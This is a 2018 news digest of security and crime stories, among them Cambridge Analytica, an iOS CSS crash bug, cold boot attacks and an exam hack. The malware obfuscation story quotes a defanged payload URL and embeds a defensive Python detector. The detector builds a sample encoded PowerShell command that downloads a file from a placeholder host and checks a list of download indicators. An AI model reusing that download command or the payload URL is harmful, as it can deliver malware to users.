September 19, 2018

2 arrested in Uttarakhand for WhatsApp chat on killing Defence minister

Two persons were arrested on Monday from Uttarakhand over an exchange of messages on WhatsApp discussing a plan to allegedly kill Indian Defence Minister Nirmala Sitharaman during her visit to the state.

The minister paid a visit to Dharchula town of Pithoragarh district in Uttarakhand on Monday to inaugurate a mega medical camp organised by the Army on the occasion of Prime Minister Narendra Modi's birthday. His birthday is being celebrated as 'Seva Diwas'.

The police were alerted to the message at 9.30pm on Sunday. It is being probed whether the duo had any criminal background or possessed any arms and ammunition.

The two have been booked under Section 506 (criminal intimidation) of the IPC and Section 66 of the Information Technology (IT) Act, Pithoragarh SP Ramchandra Rajguru said. "We were alerted to the chat (about killing the defence minister) on a WhatsApp group at 9.30 pm on Sunday. We identified two persons between whom the chat was taking place and arrested them Monday morning ahead of the defence minister's arrival here," he said.

The controversial message sent by one of the arrested duo reads, "Main shoot karunga Sitharaman ko, kal uska akhiri din hoga. ('I will shoot Sitharaman, tomorrow will be her last day')", police said.

The credentials of the admin of the WhatsApp group are also being looked into, the SP said. While the matter is still under investigation, Rajguru said that it appeared, prima facie, that the duo was drunk while they were chatting.

September 19, 2018

CBI writes to Facebook, Cambridge Analytica on illegal data harvesting

The Central Bureau of Investigation in India has written to Britain-based consultancy firm Cambridge Analytica, Global Science Research (GSR), and Facebook asking them to hand over the information regarding alleged data theft of Indian Facebook users.

“We have written to three firms separately to seek details regarding the allegations. Further investigation will take place after we receive a reply,” a CBI official said.

A month ago, the agency sent letters to the three companies after a reference from the Ministry of Electronics and Information Technology, seeking details of the illegal data collection exercise they are alleged to have adopted.

It is alleged that Global Science Research obtained the data and then supplied it to Cambridge Analytica. According to CBI officials, GSR used “illegal means” to retrieve the personal data of Indian Facebook users.

Facebook has said that more than 20 crore users in India were affected by the data breach.

“Facebook responded that they will streamline their processes regarding personal data. They stated that the case of Cambridge Analytica was a case of breach of trust…” IT minister Ravi Shankar Prasad had said.

September 17, 2018

A new CSS snippet can crash and restart your iPhone, iPad

A security researcher has discovered a new way to crash and restart any iPhone or iPad instantly using just a few lines of code.

The code could easily be spread by email or through social media posts; once the Apple device user opens the snippet, the device reboots without warning and the user loses all unsaved data.

A Berlin-based security researcher Sabri Haddouche wrote the 15 lines of code and shared it in a post on Twitter.

“Anything that renders HTML on iOS is affected,” he said. He warned that the code could reach a victim as a link sent on Facebook or Twitter, by email, or through any other medium.

The snippet exploits a flaw in Apple's operating system that makes it consume all the available resources on the iOS device, ending in a kernel panic that restarts the device.

Haddouche packaged the code as Cascading Style Sheets (CSS), the language that controls how plain HTML is displayed on screen.

'The attack uses a weakness in the -webkit-backdrop-filter CSS property, which uses 3D acceleration to process elements behind them,' Mr Haddouche told ZDNet.

'By using nested DIVs with that property, we can quickly consume all graphic resources and freeze or kernel panic the OS.'

September 17, 2018

Obfuscation: Another Cyber-crime Contrivance to Bypass Antivirus Software

A recently unearthed malware sample changes its overall signature when the final payload is delivered, using an obfuscation technique that dodges anti-virus scanning. The technique is a convenient way for cyber-criminals to escape anti-virus detection.

Most anti-virus products depend on signature-based detection. Under obfuscation the overall structure keeps transforming while the functions stay unaltered, creating an evasion layer that helps the malware side-step anti-virus detection.

The most common obfuscation techniques used to avoid anti-virus are packers, which compress or ‘pack’ a malware program; crypters, which encrypt a malware program; and other mutators, which change the overall number of bytes in the program.

A researcher stumbled upon a PowerShell obfuscation technique distributed as a ZIP file containing a PDF document and a VBS script. The VB script was found to use Base64 encoding to obfuscate the first layer. The PowerShell script then downloads a file from “hxxps://ravigel[dot]com/1cr[dot]dat”.

The file 1cr.dat was found to use SecureString, a string encryption method built into C# that is used to encrypt sensitive strings.

A set of instructions is designed to defeat automated sandbox analysis; the existing script then downloads another PE file “” and the final payload is injected into the target's machine.
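The stages above share one trait a defender can key on: each layer is a Base64 blob wrapping the next stage, and PowerShell's own encoded-command form uses UTF-16LE text under the Base64. The following is an added example written for this digest, not code from the researcher or from any report cited here; the dropper text, the placeholder URL (example.invalid in place of the real host) and the indicator list are constructed assumptions. It peels nested Base64 layers and reports which download and SecureString indicators surface.

```python
import base64
import binascii
import re

# Constructed sample (hypothetical, not the real dropper): an inner PowerShell command,
# wrapped in a UTF-16LE Base64 layer as -EncodedCommand expects, then wrapped again in
# a plain UTF-8 Base64 layer and embedded in a VBS-style script. Placeholder URL only.
INNER_COMMAND = (
    "$u='hxxps://example.invalid/1cr.dat';"
    "(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\\1cr.dat');"
    "ConvertTo-SecureString -String $s -Key $k"
)
ENCODED_LAYER = base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode("ascii")
OUTER_LAYER = base64.b64encode(f"powershell -enc {ENCODED_LAYER}".encode()).decode("ascii")
SAMPLE_SCRIPT = f'Set o = CreateObject("WScript.Shell")\ns = "{OUTER_LAYER}"\n'

# Runs of Base64 alphabet long enough to be a payload rather than an ordinary word.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Assumed indicator list: download primitives and the SecureString wrapper named above.
INDICATORS = (
    "DownloadFile", "DownloadString", "WebClient", "Invoke-Expression", "IEX",
    "SecureString", "hxxp", "http",
)


def _looks_like_text(s: str) -> bool:
    """Accept a decoding only if it is overwhelmingly printable ASCII."""
    if not s:
        return False
    ok = sum(1 for ch in s if 32 <= ord(ch) < 127 or ch in "\r\n\t")
    return ok / len(s) >= 0.9


def _decode_layer(blob: str):
    """Decode one Base64 blob, trying UTF-16LE first (PowerShell -EncodedCommand), then UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if _looks_like_text(text):
            return text
    return None


def unwrap(script: str, max_depth: int = 5):
    """Return (decoded_layers, indicators_found) by peeling nested Base64 wrappers."""
    layers = []
    found = set()

    def walk(text: str, depth: int) -> None:
        for word in INDICATORS:
            if word in text:
                found.add(word)
        if depth >= max_depth:  # bound recursion against pathological nesting
            return
        for match in B64_RE.finditer(text):
            decoded = _decode_layer(match.group(0))
            if decoded is not None:
                layers.append(decoded)
                walk(decoded, depth + 1)

    walk(script, 0)
    return layers, found


def is_suspicious(script: str) -> bool:
    """Flag a script that hides at least one decodable layer containing an indicator."""
    layers, found = unwrap(script)
    return bool(layers) and bool(found)


if __name__ == "__main__":
    decoded_layers, hits = unwrap(SAMPLE_SCRIPT)
    for i, layer in enumerate(decoded_layers, 1):
        print(f"layer {i}: {layer[:60]}...")
    print("indicators:", sorted(hits))
    print("suspicious:", is_suspicious(SAMPLE_SCRIPT))
```

The UTF-16LE-first order matters: a UTF-8 blob decoded as UTF-16LE yields non-ASCII garbage that the printable check rejects, while a real encoded command decoded as UTF-8 would be full of NUL bytes; the ratio test separates the two without guessing.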

Security must be kept tight and the best methods employed to limit the repercussions of such an attack. Complete DDoS protection, high availability, a 99.999% SLA and advanced security solutions must be top priorities for organizations that cannot tolerate interruption.

If malware has been uploaded to an already infected server, the communication between the attacker and the backdoor can be blocked, which alerts the admin and ultimately helps remove the malware.

Web application firewalls, backdoor shell protections and other solutions must be worked out to halt any future vulnerability and isolate any further attack.

September 17, 2018

Cold boot attacks can affect nearly all modern computers

Many people tend to put laptops to ‘Sleep’ instead of shutting them down. Whether at home or at the workplace, leaving desktops and laptops unattended may have become a habit. A cybersecurity firm has discovered a way to access a laptop’s data even with full disk encryption. According to its findings, anyone with physical access to a high-value computer can steal sensitive data held in RAM, such as passwords and corporate files, via new cold boot attacks.

In their recent blog post, F-Secure disclosed a way to steal data stored on a laptop when left unattended. They described how an attacker can pilfer encryption keys along with all data from the laptop.

The attack takes only about five minutes to pull off if the attacker has physical access to the computer, F-Secure principal security consultant Olle Segerdahl said in a statement on Thursday. These attacks require special hardware tooling and are generally not considered a threat vector for normal users, only for computers storing highly sensitive information or for high-value individuals such as government officials or businessmen. Cold boot attacks steal data from a computer's RAM, where sensitive information briefly remains after a forced reboot.

Earlier, attempts have been made to mitigate cold boot attacks by overwriting the RAM after power restoration. However, F-Secure security consultants, Olle Segerdahl and Pasi Saarinen, discovered a way to bypass such mitigations. Explaining their findings in the blog post, they state,

“The two experts figured out a way to disable this overwrite feature by physically manipulating the computer’s hardware. Using a simple tool, Olle and Pasi learned how to rewrite the non-volatile memory chip that contains these settings, disable memory overwriting, and enable booting from external devices. Cold boot attacks can then be carried out by booting a special program off a USB stick.”

September 16, 2018

Morgan Stanley to offer bitcoin swap trading

Another of the world’s largest investment banks is quietly building a product that will allow its clients to trade bitcoin, at least indirectly.

Morgan Stanley, the sixth-largest bank in the U.S. by assets, is joining Wall Street’s race toward an institutional-friendly bitcoin derivative, Bloomberg reported on Thursday, citing a person familiar with the matter. The financial institution is creating a proprietary derivatives product that will give traders “synthetic exposure” to the price of bitcoin. These derivatives would allow investors to indirectly invest in the market’s flagship currency, allotting them the option to buy into long or short positions through the contracts.

From the report:

“The U.S. bank will deal in contracts that give investors synthetic exposure to the performance of Bitcoin, said the person, who asked not to be identified because the information is private. Investors will be able to go long or short using the so-called price return swaps, and Morgan Stanley will charge a spread for each transaction, the person said.”

The report further indicated that the swaps, which Morgan Stanley (whose CEO is James Gorman) will price from bitcoin futures, will not handle bitcoin directly through the bank. Since Morgan Stanley is a regulated and established financial institution, tying the product to futures contracts is a safer bet than basing it on bitcoin’s spot price, as the Chicago Mercantile Exchange and Chicago Board of Exchange offer fully regulated bitcoin futures from which Morgan Stanley can pool pricing data.

Bloomberg’s source claimed that the derivatives are ready for launch, but it’s waiting on an in-house approval process and sufficient investor demand before taking them to market.

However, Morgan Stanley’s spokesperson has declined to comment on the developments.

Last week, Business Insider reported that rival Goldman Sachs Group Inc was ditching plans to open a desk for trading cryptocurrencies, as the regulatory framework for crypto remains unclear.

September 16, 2018

Indian Air Force online exam hacked

A team of tech-savvy fraudsters hacked into an online exam for the selection of non-commissioned Indian Air Force (IAF) officers in Rohtak.

On Saturday, Rohtak police arrested two people for the alleged hacking.

According to Jagbir Singh, the SHO of Rohtak city police station, the exam was held from September 13 to 16, and five computers were hacked.

The exam was conducted by an agency to which the Centre for Development of Advanced Computing had outsourced it, Singh said. The fiber cable of the exam center was laid from the first floor of an adjacent private hospital, he said.

The fraudsters established remote access to the computers used in the exam by setting up a parallel network. The team helped candidates by feeding them answers to the questions while the candidates simply sat idle in front of their computers.

The five hackers were found sitting with their laptops and sending exam questions to experts, the SHO said.

“Two men, who have been identified as masterminds of the entire racket and ran the exam center, are on the run,” said Singh. “They are J S Dahiya, a retired principal of the Jhajjar ITI, and his partner Sanjay Ahlwat, who runs a competitive exams’ coaching center."

The exact number of beneficiaries is not known, but the accused men charged between Rs 3.5 lakh and Rs 6 lakh from each candidate.

September 15, 2018

Two Russian Spies detained in Netherlands and deported to the Russian Federation

At the beginning of the year, two Russian spies were detained in the Netherlands on their way to Switzerland and deported to Russia.

According to the media, the two Russian spies were travelling to Switzerland to gain access to the Spiez laboratory, which helps investigate the chemical attacks in Syria and the poisoning in Salisbury that occurred in early 2018.

Moreover, the Russian hackers carried special equipment for penetrating computer networks. They would not be the first to try to hack into the lab's systems; the laboratory has been attacked by hackers several times.

According to the Dutch newspaper "Handelsblad", this incident happened early this year, but the exact date of the detention of Russian spies is unknown.

The security services of the Netherlands, Switzerland and Great Britain detained the Russian hackers. However, it remains unclear why the Russians were released and not brought to trial in the Netherlands.